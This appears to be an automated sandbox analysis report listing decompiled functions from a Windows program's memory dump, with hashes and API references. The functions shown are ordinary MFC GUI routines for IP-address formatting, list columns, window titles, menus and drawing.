Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2012#2096#2120#2864#2920#3289#384#4163#554#686#807DesktopH_prologMenuStateWindow
String ID:
API String ID: 577007885-0
Opcode ID: f476e397ff565bcff6725b31b2459322a797d793f862318b20a2136ff8ad7648
Instruction ID: eb5594da060ff42b4f2a8cbd6c29204c7730d8f3c6820adc5771d80721ee1510
Opcode Fuzzy Hash: f476e397ff565bcff6725b31b2459322a797d793f862318b20a2136ff8ad7648
Instruction Fuzzy Hash: 8C418D71901129EACF10EF91DD91EEEBB79FF44304F50016BF505A2191DB389A88CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004013A7, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 80
windowCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E004013A7(void* __ecx) {
				void* _t32;
				void* _t37;
				intOrPtr _t56;
				void* _t58;

				L004269E6();
				 *((intOrPtr*)(_t58 - 0x18)) = 0;
				L00425E08();
				_t56 = 1;
				 *((intOrPtr*)(_t58 - 4)) = _t56;
				if(SendMessageA( *(__ecx + 0xb0), 0x469, 0, 0) == 0) {
					_push(_t58 - 0xd);
					_push(_t58 - 0xe);
					_push(_t58 - 0xf);
					_t32 = _t58 - 0x10;
					_push(_t32);
					L00426258();
					if(_t32 == 4) {
						_t37 = _t58 - 0x14;
						L00425FDC();
						__imp___mbscmp( *((intOrPtr*)(_t58 - 0x14)), "0.0.0.0", _t37, "%d.%d.%d.%d",  *(_t58 - 0x10) & 0x000000ff,  *(_t58 - 0xf) & 0x000000ff,  *(_t58 - 0xe) & 0x000000ff,  *(_t58 - 0xd) & 0x000000ff);
						if(_t37 != 0) {
							_push(_t58 - 0x14);
							L0042611A();
						} else {
							_push(0x44216c);
							goto L7;
						}
					} else {
						_push(0x442168);
						L7:
						L00425FB8();
					}
					 *((intOrPtr*)(_t58 - 0x18)) = _t56;
				} else {
					_push(_t58 - 0x14);
					L0042611A();
					 *((intOrPtr*)(_t58 - 0x18)) = _t56;
				}
				 *((char*)(_t58 - 4)) = 0;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return  *((intOrPtr*)(_t58 + 8));
			}

APIs

_EH_prolog.MSVCRT ref: 0040BD7D
#540.MFC42 ref: 0040BD92
SendMessageA.USER32 ref: 0040BDAA
#535.MFC42(?), ref: 0040BDBB
#6669.MFC42(?,?,?,?), ref: 0040BDDB
#537.MFC42(0044216C), ref: 0040BE2B
#800.MFC42(?), ref: 0040BE47

Strings

%d.%d.%d.%d, xrefs: 0040BE03
0.0.0.0, xrefs: 0040BE0E

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #535#537#540#6669#800H_prologMessageSend
String ID: %d.%d.%d.%d$0.0.0.0
API String ID: 2007123048-464342551
Opcode ID: 2707b27104adb6fd065ec47f20e58df5844608afe3d586410bb7a315a621c74d
Instruction ID: ecb164f9128d68005719b01a2867c75b454090b09fef68cffb4e2a168e0ff597
Opcode Fuzzy Hash: 2707b27104adb6fd065ec47f20e58df5844608afe3d586410bb7a315a621c74d
Instruction Fuzzy Hash: 07215372A00159AACB11DBD5D9859FFBB7CEF05704F50006BF205B2181DB789B44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041E4ED, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0041E4ED() {
				int _t34;
				void* _t58;
				void* _t60;
				void* _t61;

				L004269E6();
				_t61 = _t60 - 0x1c;
				L00425E08();
				 *(_t58 - 4) = 0;
				L00425E44();
				 *((intOrPtr*)(_t58 - 0x18)) =  *0x00429B7A;
				L00425FCA();
				 *((intOrPtr*)(_t58 - 0x10)) = SendMessageA( *0x00429B96, 0x1200, 0, 0);
				_push( *((intOrPtr*)(_t58 - 0x10)));
				_t34 =  *( *(_t58 + 0xc));
				_push("Column Count");
				_push(_t34);
				L0042624C();
				 *(_t58 + 8) =  *(_t58 + 8) & 0x00000000;
				if( *((intOrPtr*)(_t58 - 0x10)) > 0) {
					do {
						SendMessageA( *0x00429B96, 0x1207,  *(_t58 + 8), _t58 - 0x28);
						_push( *(_t58 + 8));
						_push("Column %i");
						_push(_t58 - 0x14);
						L00425FDC();
						_t61 = _t61 + 0xc;
						_push( *((intOrPtr*)(_t58 - 0x20)) -  *(_t58 - 0x28));
						_push( *((intOrPtr*)(_t58 - 0x14)));
						_push( *( *(_t58 + 0xc)));
						L0042624C();
						 *(_t58 + 8) =  *(_t58 + 8) + 1;
						_t34 =  *(_t58 + 8);
					} while (_t34 <  *((intOrPtr*)(_t58 - 0x10)));
				}
				 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return _t34;
			}

APIs

_EH_prolog.MSVCRT ref: 0041E4F2
#540.MFC42 ref: 0041E500
#1168.MFC42 ref: 0041E50A
#6696.MFC42 ref: 0041E518
SendMessageA.USER32 ref: 0041E52F
#6402.MFC42(?,Column Count,?), ref: 0041E544
SendMessageA.USER32 ref: 0041E562
#2818.MFC42(?,Column %i,00000000), ref: 0041E576
#6402.MFC42(?,?,?), ref: 0041E58B
#800.MFC42(?,Column Count,?), ref: 0041E5A2

Strings

Column %i, xrefs: 0041E570
Column Count, xrefs: 0041E53E

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #6402MessageSend$#1168#2818#540#6696#800H_prolog
String ID: Column %i$Column Count
API String ID: 2095205342-4111091038
Opcode ID: eeaeeeadde2053d3fdd5942da58ee8f325a02e57de623d56492885186a8dae76
Instruction ID: d8ee95baa711665d91386a6af00822c68d82649f3856d03779249b44c4bfa460
Opcode Fuzzy Hash: eeaeeeadde2053d3fdd5942da58ee8f325a02e57de623d56492885186a8dae76
Instruction Fuzzy Hash: 50217F71A00129EFCF00EF99D842AEEBBB5FF48314F51415AF915B7261C774AA50CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00401375, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00401375(void* __ecx, void* __eflags) {
				intOrPtr* _t33;
				void* _t39;
				void* _t51;
				void* _t55;

				L004269E6();
				_t33 = _t55 - 0x24;
				_push(_t33);
				L00425FE8();
				_push(0x8067);
				 *((intOrPtr*)(_t55 - 0x20)) =  *_t33;
				_push(_t55 - 0x1c);
				L00425FE2();
				 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
				_push(0x80);
				L00425FB8();
				_push(0x8073);
				 *(_t55 - 4) = 1;
				L00425FB8();
				 *(_t55 - 4) = 2;
				L00425E08();
				_push( *((intOrPtr*)(_t55 - 0x14)));
				 *(_t55 - 4) = 3;
				_push( *((intOrPtr*)(_t55 - 0x18)));
				_push("%s - %s");
				_push(_t55 - 0x10);
				L00425FDC();
				_t39 = L00401A87(__ecx + 0x4c, _t51,  *((intOrPtr*)(_t55 + 8)),  *((intOrPtr*)(_t55 + 0xc)), _t55 - 0x10, _t55 - 0x1c);
				 *(_t55 - 4) = 2;
				L00425DFC();
				 *(_t55 - 4) = 1;
				L00425DFC();
				 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
				L00425DFC();
				 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t55 - 0xc));
				return _t39;
			}

APIs

_EH_prolog.MSVCRT ref: 0040882D
#3811.MFC42(?), ref: 0040883C
#2819.MFC42(?,00008067,?), ref: 00408852
#537.MFC42(00000080,?,00008067,?), ref: 00408863
#537.MFC42(00008073,00000080,?,00008067,?), ref: 00408874
#540.MFC42(00008073,00000080,?,00008067,?), ref: 00408880
#2818.MFC42(?,%s - %s,?,?,00008073,00000080,?,00008067,?), ref: 00408898
#800.MFC42(?,?,?,?,?,00008067,?), ref: 004088BD
#800.MFC42(?,?,?,?,?,00008067,?), ref: 004088C9
#800.MFC42(?,?,?,?,?,00008067,?), ref: 004088D5
#800.MFC42(?,?,?,?,?,00008067,?), ref: 004088E1

Strings

%s - %s, xrefs: 00408892

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#537$#2818#2819#3811#540H_prolog
String ID: %s - %s
API String ID: 2936747108-125065292
Opcode ID: 76d1cb395dd15c3c40e5180bf3848f92380f2ec13a9b85fc785703cd04367b82
Instruction ID: 69b086e0f8afa25c62830a0a6104da496704a7e9e7c27f8f589c8e0f3621eccf
Opcode Fuzzy Hash: 76d1cb395dd15c3c40e5180bf3848f92380f2ec13a9b85fc785703cd04367b82
Instruction Fuzzy Hash: 17218071D04169EADF01EBE0D946BEEBB78AF14308F90845EE111731D2DB785B08CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004013B1, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E004013B1(void* __ecx, void* __eflags) {
				intOrPtr* _t33;
				void* _t39;
				void* _t51;
				void* _t55;

				L004269E6();
				_t33 = _t55 - 0x24;
				_push(_t33);
				L00425FE8();
				_push(0x8067);
				 *((intOrPtr*)(_t55 - 0x20)) =  *_t33;
				_push(_t55 - 0x1c);
				L00425FE2();
				 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
				_push(0x80);
				L00425FB8();
				_push(0x8052);
				 *(_t55 - 4) = 1;
				L00425FB8();
				 *(_t55 - 4) = 2;
				L00425E08();
				_push( *((intOrPtr*)(_t55 - 0x14)));
				 *(_t55 - 4) = 3;
				_push( *((intOrPtr*)(_t55 - 0x18)));
				_push("%s - %s");
				_push(_t55 - 0x10);
				L00425FDC();
				_t39 = L00401A87(__ecx + 0x4c, _t51,  *((intOrPtr*)(_t55 + 8)),  *((intOrPtr*)(_t55 + 0xc)), _t55 - 0x10, _t55 - 0x1c);
				 *(_t55 - 4) = 2;
				L00425DFC();
				 *(_t55 - 4) = 1;
				L00425DFC();
				 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
				L00425DFC();
				 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t55 - 0xc));
				return _t39;
			}

APIs

_EH_prolog.MSVCRT ref: 00409A55
#3811.MFC42(?), ref: 00409A64
#2819.MFC42(?,00008067,?), ref: 00409A7A
#537.MFC42(00000080,?,00008067,?), ref: 00409A8B
#537.MFC42(00008052,00000080,?,00008067,?), ref: 00409A9C
#540.MFC42(00008052,00000080,?,00008067,?), ref: 00409AA8
#2818.MFC42(?,%s - %s,?,?,00008052,00000080,?,00008067,?), ref: 00409AC0
#800.MFC42(?,?,?,?,?,00008067,?), ref: 00409AE5
#800.MFC42(?,?,?,?,?,00008067,?), ref: 00409AF1
#800.MFC42(?,?,?,?,?,00008067,?), ref: 00409AFD
#800.MFC42(?,?,?,?,?,00008067,?), ref: 00409B09

Strings

%s - %s, xrefs: 00409ABA

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#537$#2818#2819#3811#540H_prolog
String ID: %s - %s
API String ID: 2936747108-125065292
Opcode ID: 88c53ac8029c66c358c4dadf0c5607dada60ae69a0ebf183926c080e51f46df9
Instruction ID: 1e68dc2bcc95d28b682038d61f7ac3d27968601a2e49b6f56d8c30d565a5cc29
Opcode Fuzzy Hash: 88c53ac8029c66c358c4dadf0c5607dada60ae69a0ebf183926c080e51f46df9
Instruction Fuzzy Hash: B721A131D00169EECB01EBD0D946BEEBB74AF14308F50845EE011731D2DB785B09CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040204A, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E0040204A(intOrPtr __ecx) {
				long _t27;
				void* _t38;
				intOrPtr* _t51;
				intOrPtr _t53;
				intOrPtr _t63;
				intOrPtr _t68;
				void* _t70;
				void* _t72;
				long long* _t73;

				_t53 = __ecx;
				L004269E6();
				_t73 = _t72 - 0x1c;
				_t51 =  *((intOrPtr*)(_t70 + 0xc));
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)(_t70 - 0x10)) = __ecx;
				 *(_t70 - 0x14) = 0;
				 *(_t70 - 0x18) = 0x42e55c;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				if( *0x4421ac != 7 || L00401F23() != 0) {
					_push(4);
				} else {
					_push(0xf);
				}
				_t27 = GetSysColor();
				_t78 =  *((intOrPtr*)(_t70 + 0x10));
				if( *((intOrPtr*)(_t70 + 0x10)) == 0) {
					_push(_t53);
					 *_t73 =  *0x42e538;
					_t27 = L0040226B(_t78, _t27, _t53);
				}
				_push(CreateSolidBrush(_t27));
				L004264BC();
				_t9 = _t70 - 0x18; // 0x42e55c
				_t63 =  *((intOrPtr*)(_t70 + 8));
				asm("sbb eax, eax");
				FillRect( *(_t63 + 4), _t70 - 0x28,  ~_t9 &  *(_t70 - 0x14));
				L00425FA6();
				if( *0x4421ac >= 2) {
					DrawEdge( *(_t63 + 4), _t70 - 0x28, 2, 0xf);
				}
				if( *((intOrPtr*)(_t70 + 0x14)) != 0) {
					_push(GetSysColor(7));
					_push( *((intOrPtr*)(_t51 + 4)) + 4);
					_t38 =  *_t51 + 5;
					__eflags = _t38;
					_push(_t38);
					_push(_t63);
					E004010AF();
				} else {
					_push(0);
					_push(GetSysColor(7));
					_push( *((intOrPtr*)(_t51 + 4)) + 4);
					_push( *_t51 + 4);
					_push(_t63);
					L00402031();
				}
				 *(_t70 - 0x18) = 0x42c514;
				_t68 = 1;
				 *((intOrPtr*)(_t70 - 4)) = _t68;
				L00425FA6();
				 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
				return _t68;
			}

APIs

_EH_prolog.MSVCRT ref: 00417753
GetSysColor.USER32(00000004), ref: 0041779A
CreateSolidBrush.GDI32(00000000), ref: 004177B6
#1641.MFC42(00000000), ref: 004177C0
FillRect.USER32 ref: 004177DA
#2414.MFC42 ref: 004177E3
DrawEdge.USER32(?,?,00000002,0000000F), ref: 004177FC
GetSysColor.USER32(00000007), ref: 0041780C
GetSysColor.USER32(00000007), ref: 00417829
#2414.MFC42 ref: 00417852

Strings

\B, xrefs: 004177BD

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$#2414$#1641BrushCreateDrawEdgeFillH_prologRectSolid
String ID: \B
API String ID: 712680347-2993081821
Opcode ID: c2a5e10feec47e96a66a1c6cc2ee7b3e60e741085be4b5bdab70a3e552ce0b3d
Instruction ID: 63e30376ed9480428fb5f320c9fd3d45bb6a9e70846b1f6a9248cd0da315c4cf
Opcode Fuzzy Hash: c2a5e10feec47e96a66a1c6cc2ee7b3e60e741085be4b5bdab70a3e552ce0b3d
Instruction Fuzzy Hash: 54316071A04115EBDB00EF95DD46BEFBBB8EF45314F40402AF505E6181D778A984CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401771, Relevance: 18.1, APIs: 12, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00401771(void* __ecx) {
				void* _t28;
				int _t29;
				struct HWND__* _t30;
				signed int _t36;
				void* _t49;
				signed int _t58;
				void* _t62;

				L004269E6();
				_push(__ecx);
				_t36 =  *(_t62 + 0xc);
				_t49 = __ecx;
				_t28 = 0x80c83b00;
				 *((intOrPtr*)(__ecx + 0xb4)) = 1;
				if((_t36 & 0x00000004) != 0) {
					_t28 = 0x80c83300;
				}
				_push(0);
				_push( *((intOrPtr*)(_t62 + 8)));
				_push(__imp__#5484);
				_push(_t28);
				_push(__imp__#6412);
				_push(0);
				_push(0);
				L004265C4();
				if(_t28 != 0) {
					asm("sbb esi, esi");
					_t58 = ( ~(_t36 & 0x00005000) & 0x0000f000) + 0x00002000 | _t36 & 0x00000040;
					_t29 = GetSystemMenu( *(_t49 + 0x20), 0);
					_push(_t29);
					L0042635A();
					 *(_t62 - 0x10) = _t29;
					L00425E08();
					_push(0xf011);
					 *(_t62 - 4) = 0;
					L00425E02();
					if(_t29 != 0) {
						DeleteMenu( *( *(_t62 - 0x10) + 4), 0xf060, 0);
						_t29 = AppendMenuA( *( *(_t62 - 0x10) + 4), 0, 0xf060,  *(_t62 + 0xc));
					}
					_push(0xe81f);
					_push(_t58 | 0x50000000);
					_push( *((intOrPtr*)(_t62 + 8)));
					L004265BE();
					if(_t29 != 0) {
						if(_t49 != 0) {
							_t30 =  *(_t49 + 0x20);
						} else {
							_t30 = 0;
						}
						_push(SetParent( *(_t49 + 0xf0), _t30));
						L00426372();
						_push(1);
						_pop(0);
					} else {
					}
					 *(_t49 + 0xb4) =  *(_t49 + 0xb4) & 0x00000000;
					 *(_t62 - 4) =  *(_t62 - 4) | 0xffffffff;
					L00425DFC();
					_t28 = 0;
				} else {
					 *(_t49 + 0xb4) = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
				return _t28;
			}

APIs

_EH_prolog.MSVCRT ref: 00411869
#2151.MFC42(00000000,00000000,80C83B00,?,00000000), ref: 004118A7
GetSystemMenu.USER32(?,00000000,00000000,00000000,80C83B00,?,00000000), ref: 004118DD
#2863.MFC42(00000000), ref: 004118E4
#540.MFC42(00000000), ref: 004118EF
#4160.MFC42(0000F011,00000000), ref: 004118FF
DeleteMenu.USER32(?,0000F060,00000000,0000F011,00000000), ref: 00411915
AppendMenuA.USER32 ref: 00411927
#2088.MFC42(?,?,0000E81F,0000F011,00000000), ref: 00411942
SetParent.USER32(?,?), ref: 00411961
#2864.MFC42(00000000), ref: 00411968
#800.MFC42(00000000), ref: 0041197E

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$#2088#2151#2863#2864#4160#540#800AppendDeleteH_prologParentSystem
String ID:
API String ID: 3395426809-0
Opcode ID: 6f951176df43abb84ab0a7ca89f6f0d6d4a6248218fd0b69f11c3dcb785fcde9
Instruction ID: 50d9fc90dc6e62bd0db6bdd4c4df08a74ec2e7672af895ac1c5911e459836303
Opcode Fuzzy Hash: 6f951176df43abb84ab0a7ca89f6f0d6d4a6248218fd0b69f11c3dcb785fcde9
Instruction Fuzzy Hash: B931F572700525BBDB109F64DC55BEEBB69FF08354F41812AFA2997161D7389D00C798

Uniqueness

Uniqueness Score: -1.00%

Function 004021B2, Relevance: 18.1, APIs: 12, Instructions: 77
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004021B2(void* __ecx, void* __edx) {
				void* _t36;
				int _t38;
				void* _t44;
				void* _t58;
				struct HICON__* _t60;
				void* _t63;
				void* _t65;

				_t58 = __edx;
				L004269E6();
				_t63 = __ecx;
				_push(__ecx);
				L00426558();
				 *(_t65 - 4) =  *(_t65 - 4) & 0x00000000;
				GetClientRect( *(__ecx + 0x20), _t65 - 0x1c);
				_push( *((intOrPtr*)(_t63 + 0x98)));
				_push(_t65 - 0x1c);
				L004264C8();
				_push(1);
				_push(_t65 - 0x1c);
				L00426834();
				InflateRect(_t65 - 0x1c, 0, 2);
				_t36 = _t63 + 0x80;
				_push(_t36);
				L0042667E();
				_push( *((intOrPtr*)(_t63 + 0x9c)));
				_t44 = _t36;
				L00426672();
				_t38 = DrawTextA( *(_t65 - 0x6c),  *(_t63 + 0x88), 0xffffffff, _t65 - 0x1c, 0xa210);
				_t60 =  *(_t63 + 0x94);
				if(_t60 != 0) {
					asm("cdq");
					_t38 = DrawIcon( *(_t65 - 0x6c),  *((intOrPtr*)(_t65 - 0x14)) -  *((intOrPtr*)(_t63 + 0xa0)),  *((intOrPtr*)(_t65 - 0x10)) -  *((intOrPtr*)(_t63 + 0xa4)) - _t58 >> 1, _t60);
				}
				if(_t44 != 0) {
					_push(_t44);
					L0042667E();
				}
				 *(_t65 - 4) =  *(_t65 - 4) | 0xffffffff;
				L00426552();
				 *[fs:0x0] =  *((intOrPtr*)(_t65 - 0xc));
				return _t38;
			}

APIs

_EH_prolog.MSVCRT ref: 0041DE14
#470.MFC42 ref: 0041DE25
GetClientRect.USER32 ref: 0041DE35
#2754.MFC42(?,?), ref: 0041DE48
#1716.MFC42(?,00000001,?,?), ref: 0041DE55
InflateRect.USER32(?,00000000,00000002), ref: 0041DE62
#5787.MFC42(?), ref: 0041DE72
#6172.MFC42(?,?), ref: 0041DE82
DrawTextA.USER32(?,?,000000FF,?,0000A210), ref: 0041DE9C
DrawIcon.USER32 ref: 0041DEC9
#5787.MFC42(00000000), ref: 0041DED7
#755.MFC42 ref: 0041DEE3

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

